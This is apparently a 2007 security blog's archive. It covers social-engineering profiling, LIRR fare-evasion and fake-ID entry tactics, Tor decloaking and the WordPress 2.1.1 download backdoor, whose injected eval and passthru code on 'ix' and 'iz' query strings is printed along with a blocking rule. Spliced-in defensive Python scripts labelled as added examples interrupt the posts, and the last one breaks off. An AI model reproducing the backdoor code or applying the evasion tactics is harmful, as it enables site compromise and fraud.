Archive for March, 2007

Int, search yet again

Sunday, March 25th, 2007

So, I read this article. [via clips]

For at least a year before the 2004 Republican National Convention, teams of undercover New York City police officers traveled to cities across the country, Canada and Europe to conduct covert observations of people who planned to protest at the convention, according to police records and interviews.

Refraining from any political commentary, I found the techniques used by the police here interesting.

They made friends, shared meals, swapped e-mail messages and then filed daily reports with the department’s Intelligence Division. Other investigators mined Internet sites and chat rooms.

And,

By searching the Internet, police investigators identified groups that were making plans for demonstrations. Files were created on their political causes, the criminal records, if any, of the people involved and any plans for civil disobedience or disruptive tactics.

From the field, undercover officers filed daily accounts of their observations on forms known as DD5s that called for descriptions of the gatherings, the leaders and participants, and the groups’ plans.

The CIA has talked about this too.

Collecting intelligence these days is at times less a matter of stealing through dark alleys in a foreign land to meet some secret agent than one of surfing the Internet under the fluorescent lights of an office cubicle to find some open source. The world is changing with the advance of commerce and technology. Mouse clicks and online dictionaries today often prove more useful than stylish cloaks and shiny daggers in gathering intelligence required to help analysts and officials understand the world.

These techniques are by no means limited to the police and TLAs, and even I have been tasked with performing similar measures at times. OSINT and HUMINT are remarkably effective at building profiles of people or organizations, and can as easily be leveraged for offense as for defense. For example, having a conversation with someone in a bar followed up by some quick research online can quickly lead to a profile of that person or, say, the organization for which they work. Or, take this blog – it can be used to learn quite a bit about me, including places I go, which can be leveraged to “run into” me in person and try to glean more.

Profiles built from this sort of intelligence can be useful for things like determining intent, identifying threats, and pinpointing weak links. For example, take an employee posting angry blog posts about their employer. Someone wanting to attack this organization might find this information valuable, as they could potentially leverage this person’s insider status in an attack. The organization itself could find this information useful, as it might identify an imminent insider threat to the organization.

Mapping out organizations is often one of the tools used in social engineering, and there is a wealth of information to be gathered from OSINT and HUMINT. For example, when you can talk the organizational lingo, it is much easier to convince people within that organization you can be trusted.

In other words, these tools provide people and organizations a useful means to help with the people factor in security.

These techniques can be employed for gathering competitive intelligence too, as discussed here.

What else do the typical competitive intelligence offerings include? I will list, at risk of being accused of trying to sell a server, which I am not, what I have been used to do in the past:

  • Obtain competitors’ latest public version of software for comparison purposes.
  • Perform a gap analysis between competitors’ software and the client’s.
  • Reverse engineer competitors’ software or a portion of competitors’ software to take a look at what is going on under the hood.
  • Obtain competitor documentation.
  • Find security vulnerabilities in competitors’ product.
  • Attend competitor customer conferences to obtain road map and future feature information.
  • Interview for a senior technical or senior product management position at a competitor only to obtain valuable information or even recruit key team members out.

Interesting stuff.

-

Pointing out interesting searches found in my logs has been a big hit with many of you. (I am waiting for the referrer forgeries.)

You talk about how some kids game IDs, and the next thing you know, searches like this turn up…

create+%22fake++id%22+php+script

Perhaps you were thinking of the tool created by this person, although I doubt it.

Protocol question…

ssl+similarities+ssh

Not sure if this helps, but I rather enjoyed this paper back in the day and got many people I used to work with to read it.

I found this search interesting…

multicamera+people+tracking++code+source

Anyone have pointers here? I performed the same Google search quickly and turned up research [e.g., 1,2,3] on the topic and a common computer vision toolkit, OpenCV.

Lastly, these came from <snip>.<snip>.dhs.gov…

lirr+punching+ticket
why+do+they+punch+ticket+lirr

Conductors collect tickets by walking up and down the various cars of the trains and stopping at each person that has not yet been checked for tickets. Conductors punch tickets to indicate that tickets have been used, and persons whose tickets have already been punched are indicated by a placeholder the conductors put on the seats (as well as the punched ticket in many cases). Normally, they confiscate and then tear up a completely used ticket. Depending on the length of the trip, it might get punched by the conductor multiple times. For example, when I travel to and from Huntington, the ticket is punched once from origin to Jamaica, and then again from Jamaica to my destination, at which point the ticket is normally kept by the conductor. If such a ticket is only punched once, then it can still be used for the second half of the trip (i.e., Jamaica to destination).

This system keeps people that want to be honest honest, which is the vast majority of riders, including myself; however, as anyone that has ridden the LIRR regularly can tell you, there are many ways to hack this system. (Please note: Employing any of these examples is stealing from the LIRR, which could result in things like being fined or going to jail. Do not try any of this.) For example, by gaining an understanding of the various zones, which correlate to how much a trip will cost, and when a conductor checks tickets, you can find ways to pay less than you should (e.g., buying tickets for cheaper zones than your trip actually requires since the conductors only check tickets at certain points along the trip and generally do not remember your destination). Or, traveling during times when trains are crowded makes it pretty easy to avoid having to pay at all for some trips (e.g., between Jamaica and Penn), even though these “peak” times often correspond with higher rates. And so on.

News quickies

Friday, March 23rd, 2007

Half of you seem to hate the type of post that follows, the other half seem to like it – either way, I don’t think I can talk about my current projects (pesky MNDAs), so this is as good as it gets.

-

News (sort of) that ties in with much of what I have been rambling on about of late

First, pseudo-news [via clips]…

Good looks could help guilty defendants dodge justice, researchers have said.

They reported that in an experiment jurors were more likely to convict suspects deemed ugly than those seen as attractive.

A beauty bias? Go figure.

And, beauty for captcha

Hotcaptcha is a new method/model of foiling bots, not by the typical ‘can you read the twisted letters in an acid-induced background’ or similar feats of ocular gymnastics, but by taking 3 photos rated high and 6 photos rated low from hotornot.com and asking you to pick the three hot looking girls, or guys.

We are beauty recognition machines, after all. Of course, beauty itself has a blueprint, which could be leveraged for pattern matching. Anyway, fits in with my rambling post.

Next, news [via funsec]…

Mr Claes said of the thief: “He used no violence. He used one weapon – and that is his charm – to gain confidence. He bought chocolates for the personnel, he was a nice guy, he charmed them, got the original of keys to make copies and got information on where the diamonds were.

“You can have all the safety and security you want, but if someone uses their charm to mislead people it won’t help.”

Sounds like something these kids could have planned. Also, makes me think of my own bank ordeal.

Moving along, deconstructing a trojan [via ha.ckers.org]…

The code reveals that calls to functions in ws2_32.dll are used to establish itself as an LSP (layered service provider) using the Winsock2 SPI (Service Provider Interface). It “goes in between” Internet Explorer and the socket used to send the data. This is consistent with reading/enumeration of registry keys having to do with network interfaces, zones, and namespace providers. This is the mechanism used to bypass SSL/TLS and intercept the network data on the fly, before it is encrypted.

This post comes to mind. “Yeah right, crypto this.”
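The quoted analysis describes a provider registered in the Winsock2 protocol catalog, which is exactly where a defender can look for it: list the catalog entries and flag any provider whose DLL is not a well-known system file. The script below is an added example, not code from the quoted analysis or from this blog. It assumes the PackedCatalogItem layout used by the Winsock LSP sample code (a 260-byte ANSI path followed by a WSAPROTOCOL_INFOW structure), a small KNOWN_PROVIDERS baseline that you should extend from a known-clean host, and it falls back to constructed sample entries when it is not run on Windows.

```python
"""List Winsock2 protocol-catalog entries and flag Layered Service Providers
whose DLL is not a well-known system file.

Added example for this page, not code from the quoted analysis. Assumptions:
the PackedCatalogItem layout (260-byte ANSI path, then WSAPROTOCOL_INFOW) is
taken from the Winsock LSP sample code; KNOWN_PROVIDERS is a starting baseline
to tune; the sample paths built in __main__ are constructed.
"""
import ntpath
import re
import struct
import sys

CATALOG_KEY = (r"SYSTEM\CurrentControlSet\Services\WinSock2\Parameters"
               r"\Protocol_Catalog9\Catalog_Entries")
MAX_PATH = 260           # size of the ANSI provider-path field
PROTOCOL_INFO_LEN = 628  # sizeof(WSAPROTOCOL_INFOW)
# Assumed baseline of legitimate Microsoft providers; extend from a clean host.
KNOWN_PROVIDERS = {"mswsock.dll", "rsvpsp.dll"}


def build_packed_catalog_item(path, proto_name, chain_len, catalog_id):
    """Construct a PackedCatalogItem blob (used here only to build samples)."""
    info = bytearray(PROTOCOL_INFO_LEN)
    struct.pack_into("<I", info, 36, catalog_id)   # dwCatalogEntryId
    struct.pack_into("<i", info, 40, chain_len)    # ProtocolChain.ChainLen
    name = proto_name.encode("utf-16-le")[:510]
    info[116:116 + len(name)] = name               # szProtocol (WCHAR[256])
    return path.encode("cp1252").ljust(MAX_PATH, b"\0") + bytes(info)


def parse_packed_catalog_item(blob):
    """Decode provider path, protocol name, id and chain type of one entry."""
    path = blob[:MAX_PATH].split(b"\0", 1)[0].decode("cp1252", "replace")
    info = blob[MAX_PATH:MAX_PATH + PROTOCOL_INFO_LEN]
    catalog_id = struct.unpack_from("<I", info, 36)[0]
    chain_len = struct.unpack_from("<i", info, 40)[0]
    name = info[116:116 + 512].decode("utf-16-le", "replace").split("\0", 1)[0]
    if chain_len == 0:
        kind = "layered provider (LSP)"   # the hooking DLL itself
    elif chain_len == 1:
        kind = "base provider"            # e.g. the TCP/IP provider
    else:
        kind = "protocol chain (%d layers)" % chain_len  # base wrapped by LSPs
    return {"id": catalog_id, "path": path, "name": name, "kind": kind}


def is_suspicious(entry):
    """Return a reason string if the provider DLL is not a known system file."""
    resolved = re.sub(r"%SystemRoot%", lambda m: r"C:\Windows", entry["path"],
                      flags=re.I)
    directory = ntpath.dirname(resolved).lower()
    dll = ntpath.basename(resolved).lower()
    if not directory.endswith(r"\system32"):
        return "provider DLL outside system32: " + entry["path"]
    if dll not in KNOWN_PROVIDERS:
        return "unrecognised provider DLL: " + entry["path"]
    return None


def enumerate_catalog():
    """Read the live catalog (Windows only; 64-bit hosts also have Catalog_Entries64)."""
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, CATALOG_KEY) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            with winreg.OpenKey(root, winreg.EnumKey(root, i)) as sub:
                blob, _ = winreg.QueryValueEx(sub, "PackedCatalogItem")
                entries.append(parse_packed_catalog_item(blob))
    return entries


def report(entries):
    """Print every entry, marking suspicious ones; return the flagged entries."""
    flagged = []
    for e in entries:
        reason = is_suspicious(e)
        print("%s %5d %-26s %-24s %s" % ("!!" if reason else "  ",
                                          e["id"], e["kind"], e["name"], e["path"]))
        if reason:
            flagged.append((e, reason))
    return flagged


if __name__ == "__main__":
    if sys.platform == "win32":
        report(enumerate_catalog())
    else:
        # Off Windows, demonstrate on constructed entries: one legitimate base
        # provider, one layered provider and one chain pointing at a DLL in Temp.
        samples = [
            build_packed_catalog_item(r"%SystemRoot%\system32\mswsock.dll",
                                      "MSAFD Tcpip [TCP/IP]", 1, 1001),
            build_packed_catalog_item(r"C:\Windows\Temp\lsphook.dll",
                                      "MSAFD Tcpip [TCP/IP]", 0, 1013),
            build_packed_catalog_item(r"C:\Windows\Temp\lsphook.dll",
                                      "MSAFD Tcpip [TCP/IP]", 2, 1014),
        ]
        report([parse_packed_catalog_item(b) for b in samples])
```

A chain entry (ChainLen greater than 1) that names an unfamiliar DLL is the tell-tale sign described in the quote: the base TCP/IP provider is still there, but traffic from every Winsock application now passes through the layered DLL first.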

Now, we come to framing

It’s conceivable that if someone wanted to try and frame you for a crime like the one described, it’s pretty easy to forge the same forensic evidence, then go out and commit the crime. The much discussed Cross-Site Request Forgery (CSRF) attack makes it trivial for someone to force your browser to make a request you didn’t intend to make. Even seeding Google and MSN with undesirable search phrases. For example if I really wanted to, I could have loaded in these IMG SRCs on this page upon loading.

I guess this could be used for disinformation too. “I didn’t make those requests, it must have been that evil CSRF haxor.”

Finally, comments on pseudo-news…

The anonymous “editors” at SecurityFocus-A-Like IT Security Dot Com have whipped out the zero-day on the blogosphere, exploiting an obvious vulnerability (flattery injection) to hijack the keyboards of most of the security blogosphere. In this case, the vector for the attack seems to be a maliciously formatted OPML file.

Ptacek calls it a flattery injection attack. I would have called it an ego attack myself. Reminds me of this obvious people hack leveraged on security folks, or even this post, if only because ego may have been involved there too.

Feed troubles

Saturday, March 17th, 2007

So, I noticed our RSS2 feed started with a blank line, which made it invalid.

Screenshot of broken feed in Firefox 2

Then I noticed our atom feed started with a blank line. Then I noticed that every page generated by wordpress contained a blank line at the top. This annoyed me.

I checked if this was a known issue for 2.1.2 and did not find it there, so I assumed this problem was my own. I started poking around in the few PHP files I had modified since the last release of wordpress. No dice. Then, I poked around in the modifications I made to theme files, even though I thought that should have no impact on feeds. No dice.

Then I did a quick search on the wordpress support forums and noticed this thread. In it was the following.

Check your wp-config.php file. That’s a prime candidate for having an extra blank line at the top or bottom of the file. Same goes for your theme’s functions.php file, if you have one.

I had forgotten about that file, wp-config.php, and it turned out our wp-config.php had a couple of extra linefeeds at the end. Removing these fixed the problem.
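The mechanism behind this is that PHP prints anything outside the `<?php … ?>` tags verbatim, swallowing only the single newline that immediately follows a closing `?>`; a second newline at the end of wp-config.php therefore lands in front of the feed’s XML declaration. The checker below is an added example (not part of this post or of WordPress) that reports such stray output in include files and repairs the whitespace-only case; its sample sources are constructed.

```python
"""Find PHP include files that emit stray output outside their <?php ... ?> tags.

Added example, not part of the original post. A blank line ahead of the XML
declaration invalidates an RSS or Atom feed (and breaks header() calls), and
the usual cause is the one that bit this blog: extra newlines after the closing
?> of wp-config.php or a theme's functions.php. The sample sources below are
constructed.
"""
import os
import sys

BOM = b"\xef\xbb\xbf"
INCLUDE_FILES = ("wp-config.php", "functions.php")  # files that must never print


def stray_output(source: bytes) -> dict:
    """Return what PHP would print outside the code tags of an include file.

    'leading'  - bytes before the first '<?' (a UTF-8 BOM counts).
    'trailing' - bytes after the last '?>', minus the single newline (LF or
                 CRLF) that PHP swallows immediately after a closing tag.
    Heuristic: a '?>' inside a string or comment is taken as a closing tag.
    """
    first = source.find(b"<?")
    leading = source if first < 0 else source[:first]
    last = source.rfind(b"?>")
    if last < 0 or source.find(b"<?", last) >= 0:
        trailing = b""   # no closing tag, or more code follows it: nothing leaks
    else:
        rest = source[last + 2:]
        if rest.startswith(b"\r\n"):
            rest = rest[2:]
        elif rest.startswith(b"\n"):
            rest = rest[1:]
        trailing = rest
    return {"leading": leading, "trailing": trailing}


def strip_trailing(source: bytes) -> bytes:
    """Repair the common case: whitespace after the final '?>' becomes one newline."""
    last = source.rfind(b"?>")
    if last < 0 or source.find(b"<?", last) >= 0:
        return source
    if source[last + 2:].strip() == b"":
        return source[:last + 2] + b"\n"
    return source   # real content after '?>': leave it for a human to judge


def scan_tree(root: str, names=INCLUDE_FILES):
    """Walk a WordPress tree and list include files that would print something."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name not in names:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                result = stray_output(fh.read())
            for where, blob in result.items():
                if blob:
                    findings.append((path, where, blob))
    return findings


# Constructed samples: wp-config.php style files with and without the defect.
SAMPLES = {
    "clean":        b"<?php\ndefine('DB_NAME', 'wp');\n?>\n",
    "two_newlines": b"<?php\ndefine('DB_NAME', 'wp');\n?>\n\n",   # the case in the post
    "crlf":         b"<?php\r\ndefine('DB_NAME', 'wp');\r\n?>\r\n\r\n",
    "bom":          BOM + b"<?php\ndefine('DB_NAME', 'wp');\n",
    "no_close_tag": b"<?php\ndefine('DB_NAME', 'wp');\n",          # safest style
}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, where, blob in scan_tree(sys.argv[1]):
            print("%s: %s output %r" % (path, where, blob))
    else:
        for label, src in SAMPLES.items():
            print("%-13s %r" % (label, stray_output(src)))
```

Run it with the WordPress root as the argument to check a live install; with no argument it walks the constructed samples. Leaving the closing `?>` off pure-code files altogether, as the last sample does, removes the failure mode entirely.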

Screenshot of fixed feed in Firefox 2

This reminded me of how forgiving the web can be on syntax. And, for those with feedreaders that do the right thing, you too can now subscribe to the D-kriptik feeds (RSS or Atom)!

ID checks, search revisited again

Wednesday, March 14th, 2007

I probably sound like a broken record these days, but people are my interest right now. And, one of the things I really enjoy about exploring this area is that you get to meet a lot of people, and hear their takes on the people factor and security. So, while none of the following may be new to you, I found it interesting…

(Of note, this information is for my research purposes, and I am posting it here to foster discussion with some of my readers. Realize that there are real consequences to misrepresenting yourself at ID checks, such as being fined or going to jail. Do not try any of this.)

A couple of days ago, I was riding on the train, when a group of women pulled me into a conversation. Something about my shirt. We got to talking about places to go, and the next thing you know we were talking about ID requirements. Turned out, these ladies were college students and not quite legal drinking age, which is often a prerequisite to entering venues in NYC, and this was the motivation behind the attacks to be discussed.

Now it gets interesting. One of the women in this group actually had a stack of real IDs that were all for people of legal age. The IDs were gathered from friends and family (e.g., older sisters), whether given or taken (e.g., “borrowed without permission”). Basically, what these ladies did was figure out which IDs were the best matches for each of the members of the group, and then each of them tried to pass themselves off as legal age using the selected ID. They noted that the height and eye color listed on NY driver’s licenses were entered by the person getting the license, sometimes input into the system incorrectly, and not at all verified by the issuer. They also pointed out that NY driver’s licenses would note when a person required corrective lenses or contacts, which mattered since wearing (or not wearing) glasses could change appearance and wearing contacts could change eye color. More interesting though, they discussed how legitimate IDs let a place claim that it did its job at the door, as the facial recognition process itself was quite subjective (this made me think of plausible deniability – I told the ladies they should consider politics). Their impression of the effectiveness of this attack at getting them past the ID check was at about 85%.

In order to up the probability of success, the ladies employed two secondary techniques. One technique was having the most adept social engineers of the group conduct the primary interactions with the ID checker. The ranking of such skills was subjective, but it generally came down to being attractive and social. The point of this was to get the checker in the frame of mind of wanting to allow the ladies to enter, which also implied getting the checker to want to accept the IDs being presented. This was also used to avoid any signs of nervousness from the group and get them looking the part. The other technique was just memorizing the details on the ID and being ready for small talk with the ID checker (that applied to everyone, not just the primaries used in the first secondary technique) – such interactions were rare, but did happen from time to time. With these two simple measures in place, their impression of the effectiveness of the attack was at about 95%.

Ok, so these college students had a fairly debilitating attack against these subjective facial recognition ID checks, but it was based on obtaining a number of legitimate IDs – could they get rid of this requirement, bypassing IDs all together? Well, I inquired about what happens when they don’t have IDs. Besides noting that obtaining real IDs was “easy” right now and so there was no reason to make the attack more difficult, there were a few other interesting points they made, which applied both with the legitimate ID attack and without.

One of the keys to success they cited was doing their homework (e.g., reconnaissance). Knowing how strict a place was about IDs, knowing what had worked or not worked in the past, having profiles on the different bouncers (e.g., a “mean” to “nice” scale), having affiliations with particular gatekeepers (e.g., being friends with the doorman), understanding their current ID situation (e.g., did most of the group have real IDs? did none of the group have real IDs?) etc. was all involved here. Their social network was particularly important, as this information was shared among their peers and easy to come by knowing the right people (sounded like the hacker community to me).

These women knew exactly who were the skilled social engineers of the group, and those were the people they set loose on the bouncers. With the homework done, it often came down to these people’s skill sets once out there in the wild performing the attack. They actually pointed to a specific member of the group and said she could get in almost every door, sometimes because of contacts, most times because of personality, looks, and manipulation.

These ladies also understood the impact of beauty. Besides the obvious things like flirting with bouncers, they felt that most places were looking to attract beautiful women, because that in turn attracts everyone else, so places wanted to let them in. Also, they were careful to note here that beauty was important even with the legitimate ID attack, as they felt ID checkers sometimes did recognize the IDs were not really theirs, but, because they were an attractive group of women, it was in the place’s best interest to let the ladies in, given the plausible deniability factor.

Anyway, all of this sounded very similar to my recent ramblings, and so I thought it fitting for this blog. These sorts of attacks are not restricted to age verification ID checks by any means, and I even think the general methodology employed here ports to an extent to how to conduct attacks on systems in general.

-

After a long dry spell, the interesting search terms just keep on coming. It’s not a weekend, but so be it –

how+use+ix+wordpress+2.1.1

LOL. This post might be of interest.

Why+does+physical+beauty+threaten+people%3F

You might enjoy this post. Oh, and cool pseudo-fact – people tend to give beautiful people more personal space than not so beautiful people. I ran into a model last weekend and asked them to put it to the test – people flew out of their way when we walked down the street.

does+being+beautiful+go+a+long+way

You too might enjoy this post.

Tor again

Thursday, March 8th, 2007

Via this thread on or-talk, I noted the following.

Amidst concerns that pedophiles are using public Tor (the Onion Router) servers to trade in child pornography, über-hacker HD Moore is building a tracking system capable of pinpointing specific workstations that searched for and downloaded sexual images and videos of kids.

Moore, the brains behind the Metasploit Project, has come up with a series of countermeasures that include using patched Tor servers and a decloaking engine to detect the exact location of a pedophile within an organization or residence.

The attack is a demonstration of how to compromise certain Tor users’ anonymity. HD Moore maliciously modifies data before it is passed into the Tor network in an attempt to get the victim’s web browser to bypass Tor once it receives that data out the other end of the Tor network. And, I imagine it would be trivial to modify the code to look for other search terms, or just target any Tor user that hits that node. Also, I am sure HD Moore could have just as easily used his malicious Tor node to inject payloads that exploit browser implementation flaws resulting in arbitrary code execution as well.

I have written about this sort of thing before.

Using modern web browsers in an anonymous manner is hard when someone is trying to penetrate that anonymity. All that scripting and dynamic content makes it even harder, as this example illustrates. And, given the vulnerabilities in web browsers that keep being discovered and actively exploited, the ability of an attacker to execute rogue code on an end-user’s machine simply by browsing a malicious web site seems like a given – in other words, no need for Java when you have document.getElementById().createTextRange() [e.g., 1, 2] (recently patched).

Also, it should be noted that this means of gathering an IP address is not an attack on Tor itself. The attack exploits tools being used outside of Tor, in particular a web browser with proxy support (somewhat) and enabled Java support – the end-user is not being protected by, or using, Tor and Privoxy, as their traffic is not being routed through these proxies on its way to the outside world. (Yeah right, crypto this?)

These attacks also illustrate honesty issues with Tor nodes that can impact the anonymity of the end Tor user, which I have commented on before.

While there is often logic thrown about that the larger the number of nodes in a mixnet, the stronger the anonymity, such logic often leaves out one key point, the honesty of the nodes. There is a reason remailer networks have traditionally been very small and (at least partially) maintained by some “trusted” nyms. Such honesty problems are not trivial to solve.

All that sounds bad, but I still think Tor is a good tool to use for general purpose anonymous browsing of the web with Firefox. Sure, it’s not perfect, but it works well enough when properly utilized – the majority of web sites you hit through Tor won’t know your real IP. I know I use it from time to time, on both Windows and FreeBSD machines. (As to attacks outside of those trying to compromise your Tor provided anonymity, well, I tend to think the risks of using Tor here are no greater than the normal risks you assume when you, say, use your computer to play on the Internet.)

The Windows Tor & Privoxy & Vidalia bundle itself includes all the tools necessary to easily get Firefox pumping its traffic through Tor with the click of a green onion button. Add in, say, noscript, which is quite user friendly, and disable Java, javascript, and all plugins, and you are good to go against the attack HD Moore utilized. And, the people on the or-talk mailing list are more than willing to help with Tor related troubles.

Anyway, I think this publicity is a good thing in terms of bettering the usability of Tor. These attacks have been well understood by technical users of Tor since the beginning, and this has lit a fire in the Tor community on how best to teach non-technical users to properly utilize Tor. With the flame burning, you have to love the ultra quick response time of the Tor team. For example,

> >The problem is if it isn’t right on the download page and translated
> >into most languages, people will just assume they are good to go
> >without bothering to read the FAQ until something breaks (as Jason
> >pointed out). I also fall into this category with most software (even
> >stuff I develop for ;) .
>
> Hear, hear!
>

Yes. Three cheers. I think this is a fine interim thing to do.

Which has already resulted in a warning being added to the Tor download page.

Warning

Tor by itself is NOT all you need to maintain your anonymity. There are several major pitfalls to watch out for.

As to HD Moore’s countermeasures, this post in or-talk should be noted.

As a survivor of childhood sexual abuse, I’m personally getting annoyed
by this whole “nab the paedophiles” thing, for several reasons:

1.) 90+ percent of sexual abuse of children happen from family members
or friends of the family.. so wasting huge resources on 10% while
blatantly (and blissfully) ignoring the 90%, does society a huge
disservice. by focusing the public’s attention on the smallest part of
the problem and away from the real problems.

2.) I can almost guarantee that his guys “key words” would trigger on
abuse survivors talking in an online support group and I can’t even
begin to tell you how damaging it would be for an abuse survivor to have
to deal with being falsely accused of being a perp.

I say this a lot, and it fits here as well. Working in IT security means you have to be able to understand how an organization or system works – you build a big picture and then dig down into its parts. While my major interest at the moment is in gaining a better understanding of people, this, of course, also means understanding processes, policies, assets, technologies, etc. Without such an understanding, accurately assessing the risks to an organization or system, and then integrating effective and efficient security measures into that organization or system, is quite difficult or impossible.

Update: HD Moore’s Decloak.

No search from address bar, search revisited

Saturday, March 3rd, 2007

What is it with this search from address bar stuff? It annoys me to no end, and I have always turned it off in Internet Explorer. (To do so in IE7, go to Tools->Internet Options->Advanced->Search from Address bar->Do not search from the Address bar.)

So, I was trying to cut/paste a link into the address bar of Firefox 2, but I guess I messed up, and whatever buffer holds copy/paste data still had my previously copied data. I hit enter without thinking, and next thing I knew, Google was telling me it found no search results. While it was just a copy of my last blog post in that buffer, it could just have easily been something else.

I really don’t like this feature and did not realize it was even available, let alone turned on by default, in Firefox 2. To disable it in Firefox 2, browse to “about:config”, and set “keyword.enabled” to “false”. Good riddance.

-

This being a weekend and all, I might as well throw in a weekend post. So, speaking of searches, you may remember this – well, fun times taking a quick peek at recent log entries.

Somehow, we have become associated with dating advice…

does+a+bartista+like+me+%3F

In my neighborhood in NoVA, I once had a barista that liked me. She doubled the size of my drinks, which was quite nauseating when what I wanted was a triple espresso and instead received a giant coffee cup of espresso; however, I don’t think that fraud and nausea necessarily indicate romantic interest, so that is of no help to you. What may be of interest to you is that, when I talked to her about not giving me these horrific cups of espresso, the resulting conversation ended with a phone number exchange.

And, look at what turned up again…

lounges+in+manhattan+that+dont+ID

The list of places I go to may have changed, but the necessity of showing ID at all of these places has not. Anyway, my ramblings of late might be of use to you.

Oh, and the icing on the cake…

blogs++panty+pulling

Now that’s class.

Wordpress 2.1.1 backdoor

Friday, March 2nd, 2007

We run wordpress for this blog. We tend to keep it up to date as well.

Now, wordpress issues seem to be a dime a dozen, so normally I wouldn’t say anything about them, but this was a bit interesting.

This morning we received a note to our security mailing address about unusual and highly exploitable code in WordPress. The issue was investigated, and it appeared that the 2.1.1 download had been modified from its original code. We took the website down immediately to investigate what happened.

These types of attacks can be particularly effective, if executed well. Put in a clever, subtle backdoor, and maybe no one will notice. Pwned by default. (Poorly paraphrasing, someone I knew once argued that all features of a system that could lead to security compromises were just backdoors, whether they were intentionally put there or not – this included everything from holding a funky key combination at boot to gain a debug prompt to a stack-based buffer overflow that led to arbitrary code execution as root.)

Anyway, this was of particular interest to us.

If you are a web host or network administrator, block access to “theme.php” and “feed.php”, and any query string with “ix=” or “iz=” in it.

Normally, I do a diff between minor releases and upload those files that had changed. Sometimes I look at the output of the aforementioned diff beyond just building a list of what files had changed, but, generally, I only do so if something sparks my curiosity, or when I see fixes come across the wordpress mailing lists and I want to verify they were incorporated into the release. I am not sure whether I would have noticed such a diff varied from the list in the wordpress team’s blog post.

However, due to time constraints (read laziness) during the last upgrade, I just upgraded those files listed as changed in this blog post.

Files changed in 2.1.1 from 2.1:

Noticeably absent in that list is “theme.php” and “feed.php”. Maybe that’s a good thing.

(Oh, and the open source versus closed source debate with regards to backdoor’d code already happened quite loudly when this was announced. Of course, wordpress is just a bunch of PHP scripts anyway.)

Update: Here are the details.

The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
    // backdoor: evaluates attacker-supplied PHP taken from the "ix" query string
    eval($filterdata);
}

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

in wp-includes/theme.php

function get_theme_mcommand($mcds) {
    // backdoor: runs an attacker-supplied shell command taken from the "iz" query string
    passthru($mcds);
}

if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.
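As an added example (not code from the WordPress announcement or from this blog), here is a check that covers both halves of the advice above: it scans PHP source for a wrapper function that hands a `$_GET` parameter to `eval()` or `passthru()`, which is the shape of the quoted snippet, and it scans web server access logs for direct requests to `wp-includes/theme.php` or `wp-includes/feed.php` and for any `ix=` or `iz=` query string, which is what the “block access” note asks hosts to filter. The access-log lines and the “clean” source are constructed samples; the backdoor source is the snippet quoted above.

```python
"""Detect the WordPress 2.1.1 download backdoor in PHP source and in web logs.

Added example, not code from the WordPress announcement. The backdoor source
below is the snippet quoted in the announcement; the access-log lines and the
'clean' PHP source are constructed samples.
"""
import re
from urllib.parse import parse_qs, urlsplit

BACKDOOR_FILES = {"theme.php", "feed.php"}
BACKDOOR_PARAMS = {"ix", "iz"}

# A function whose whole body passes its single argument to eval() or passthru().
WRAPPER_RE = re.compile(
    r"function\s+(\w+)\s*\(\s*(\$\w+)\s*\)\s*\{\s*(eval|passthru)\s*\(\s*\2\s*\)\s*;\s*\}",
    re.S)
# Request data used directly as code or as a shell command.
DIRECT_RE = re.compile(
    r"\b(eval|passthru|system|shell_exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\s*\[")
# Apache/nginx combined log format: ip ident user [time] "METHOD target proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def _line_of(source, offset):
    return source.count("\n", 0, offset) + 1


def find_backdoor_code(source: str):
    """Return one finding per place that routes request data into a code/command sink."""
    findings = []
    for m in WRAPPER_RE.finditer(source):
        name, sink = m.group(1), m.group(3)
        # The wrapper is only a backdoor if something calls it with request data.
        call = re.search(r"\b%s\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*['\"]?(\w+)"
                         % re.escape(name), source)
        if call:
            findings.append({"line": _line_of(source, m.start()), "function": name,
                             "sink": sink, "source": "$_" + call.group(1),
                             "param": call.group(2)})
    for m in DIRECT_RE.finditer(source):
        findings.append({"line": _line_of(source, m.start()), "function": None,
                         "sink": m.group(1), "source": "$_" + m.group(2), "param": None})
    return findings


def scan_access_log(lines):
    """Flag requests matching the announcement's blocking advice."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, method, target, status = m.groups()
        parts = urlsplit(target)
        script = parts.path.rsplit("/", 1)[-1]
        params = set(parse_qs(parts.query, keep_blank_values=True))
        reasons = []
        if params & BACKDOOR_PARAMS:
            reasons.append("backdoor parameter " + ", ".join(sorted(params & BACKDOOR_PARAMS)))
        if script in BACKDOOR_FILES and "/wp-includes/" in parts.path:
            reasons.append("direct request to include file " + script)
        if reasons:
            hits.append({"ip": ip, "time": when, "target": target,
                         "status": status, "reasons": reasons})
    return hits


# The feed.php snippet quoted in the WordPress announcement.
FEED_BACKDOOR = """<?php
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
"""

# Constructed stand-in for an unmodified include file.
CLEAN_SOURCE = """<?php
function get_theme_mod($name) {
    $mods = get_option('mods_' . get_current_theme());
    return isset($mods[$name]) ? $mods[$name] : false;
}
"""

# Constructed access-log lines (RFC 5737 documentation addresses).
LOG_LINES = [
    '203.0.113.7 - - [02/Mar/2007:09:14:02 -0500] "GET /wp-includes/feed.php?ix=x HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [02/Mar/2007:09:14:09 -0500] "GET /wp-includes/theme.php?iz=x HTTP/1.1" 200 88 "-" "Mozilla/4.0"',
    '198.51.100.2 - - [02/Mar/2007:09:15:00 -0500] "GET /?feed=rss2 HTTP/1.1" 200 4111 "-" "Feedreader"',
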